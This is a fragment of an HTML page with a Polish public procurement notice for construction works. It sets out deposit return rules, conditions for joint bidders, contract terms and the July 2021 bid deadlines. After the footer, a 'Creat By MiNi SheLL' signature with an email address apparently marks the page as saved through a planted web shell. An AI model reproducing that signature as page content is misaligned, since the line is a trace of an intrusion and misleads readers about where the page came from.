zaleca dokonanie przelewu ze<br/>stosownym wyprzedzeniem .5. Zamawiający dokona zwrotu wadium na zasadach określonych w<br/>art. 98ust.1 i 2 ustawy Pzp. Wykonawca będzie miał możliwość w przypadkach określonych w<br/>art. 98ust. 2 ustawy Pzp wystąpienia o zwrot wadium, przy czym złożenie wniosku o zwrot<br/>wadium spowoduje rozwiązanie stosunku prawnego Zamawiającego z Wykonawcą i utratę<br/>przez Wykonawcę prawa do korzystania ze środków ochrony prawnej, uregulowanych w Dziale<br/>IX ustawy Pzp. 6. Zamawiający zwróci wadium wniesione w innej formie niż w pieniądzu poprzez<br/>złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. Zaleca się, aby<br/>poręczenie lub gwarancja wskazywały adres mailowy na jaki Zamawiający winien<br/>składać oświadczenie o zwolnieniu wadium, o którym mowa w art. 98 ust. 5 ustawy Pzp.7.<br/>Zamawiający zatrzyma wadium wraz z odsetkami, w przypadkach określonych w art. 98 ust. 6<br/>ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego . 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy<br/>Pzp, oraz w przypadkach, o których mowa w pkt 9.2. IDW , natomiast spełnianie warunków<br/>udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt 8.2. IDW. 3. W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców , oświadczenie, o którym mowa w<br/>pkt 10.2 IDW składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie , w jakim każdy z wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu . 4. W przypadku, gdy spełnienie warunku opisanego : 1) w pkt 8.2.4)<br/>IDW wykazuje co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;2) w pkt 8.2.4) IDW wykonawcy wykazują poprzez poleganie na zdolnościach tych<br/>z wykonawców , którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności<br/>są wymagane - Wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają,<br/>które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy . 5. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na<br/>wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o<br/>których mowa w pkt 10 IDW, przy czym : 1) podmiotowe środki dowodowe o których mowa w<br/>pkt10.8.IDW składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą<br/>spełnianie warunku , w zakresie i na zasadach opisanych w pkt 8.2 IDW ; 2) dokumenty i<br/>oświadczenia o których mowa w pkt 10.7. IDW składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami PPU <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-14 10:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty powinny by złożone za pośrednictwem Platformy zakupowej https:// gddkia.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-14 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-12</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com